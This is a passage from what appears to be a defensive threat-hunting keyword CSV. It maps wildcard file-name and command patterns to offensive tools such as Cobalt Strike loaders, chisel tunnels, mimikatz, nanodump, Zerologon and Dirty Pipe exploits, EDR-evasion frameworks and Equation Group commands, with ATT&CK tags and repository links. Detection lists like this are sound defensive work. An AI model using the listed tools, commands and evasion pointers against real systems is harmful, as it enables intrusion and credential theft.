- T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*cgojmfochfikphincbhokimmmjenhhgk*","greyware_tool_keyword","Whoer VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*Chachi-Enumerator.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Chachi-Enumerator.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*ChaitanyaHaritash/kimi*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*chameleon.py *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*changepasswd.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*change-windows10-mac-address.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*charlesnathansmith/whatlicense*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" +"*charles-proxy*","offensive_tool_keyword","charles-proxy","A cross-platform GUI web debugging proxy to view intercepted HTTP and HTTPS/SSL live traffic","T1043.002 - T1556.001 - T1573.001","TA0012 - TA0017","N/A","N/A","Sniffing & Spoofing","https://charlesproxy.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*charlotte-main.zip*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*ChatLadon.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*ChatLadon.rar*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*check_all*.c*","offensive_tool_keyword","CheckPlease","c project from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" +"*check_all*.go*","offensive_tool_keyword","CheckPlease","go script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" +"*check_all*.pl*","offensive_tool_keyword","CheckPlease","perl script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" +"*check_all*.ps1*","offensive_tool_keyword","CheckPlease","ps1 script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","1","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" +"*check_all*.py*","offensive_tool_keyword","CheckPlease","python script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","1","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" +"*check_and_write_IAT_Hook*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*check_cve-2020-1472.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1072","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WiIs0n/Zerologon_CVE-2020-1472","1","1","N/A","N/A","1","10","5","2020-10-05T07:47:02Z","2020-09-29T18:45:44Z" +"*check_function ntdll.dll EtwEventWrite*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*check_ppl_requirements*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*checkIfHiddenAPICall*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*Check-LocalAdminHash.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*CheckPlease*","offensive_tool_keyword","CheckPlease","This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads.","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" +"*CheckPort.csproj*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" +"*CheeseDCOM.exe*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*CheeseExec.csproj*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*CheeseExec.exe*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*CheesePS.csproj*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*CheesePS.exe*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*CheeseRDP.exe*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*CheeseSQL.exe*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*CheeseTools.sln*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*CheeseTools-master*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*chenjiandongx/sniffer*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z" +"*Chimera-main.zip*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*Chimera-master.zip*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*chioafkonnhbpajpengbalkececleldf*","greyware_tool_keyword","BullVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*chisel -*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel client -*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel client http*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel server -*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel.exe *","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*chisel.exe client*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel.exe server*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel.jpillora.com*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel_1*_darwin_*.gz*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel_1*_linux_*.gz*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel_linux_amd64*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel_windows_amd64.exe*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel-master.zip*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chknull.zip*","offensive_tool_keyword","ChkNull","Checks for Users with No passwords","T1078 - T1201","TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","1","2","0","2023-04-16T02:15:42Z","2023-04-16T01:49:12Z" +"*chmod +x dirty*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","0","N/A","N/A","1","41","21","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" +"*chmod 4777 /tmp/.scsi/dev/bin/gsh*","greyware_tool_keyword","tmpwatch","Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time","T1070.004 - T1059 - T1047","TA0007 - TA0002 - TA0040","N/A","N/A","N/A","https://linux.die.net/man/8/tmpwatch","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*chmod 666 /var/run/utmp~*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*chmod 700 lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*chmod 700 nscd crond*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers - EncTelnet/Poptop To use Nopen over an existing connection","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/thePevertedSpartan/EQ1/blob/0c2354ff1073099b2aa417030b3167ec29d7279c/Linux/doc/old/etc/user.tool.poptop.COMMON","1","0","N/A","N/A","1","0","1","2017-11-12T08:13:06Z","2017-11-12T08:10:08Z" +"*chmod 755 lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*choco install * common.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*chocobo_root.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*chocolate.kirbi*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*Choosing DLL to hijack.*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*chown root %s chmod 4755 %s %s*","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Shell spawning","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*chown root:root /tmp/.scsi/dev/bin/*","greyware_tool_keyword","tmpwatch","Equation Group hack tool set command exploitation- tmpwatch - removes files which 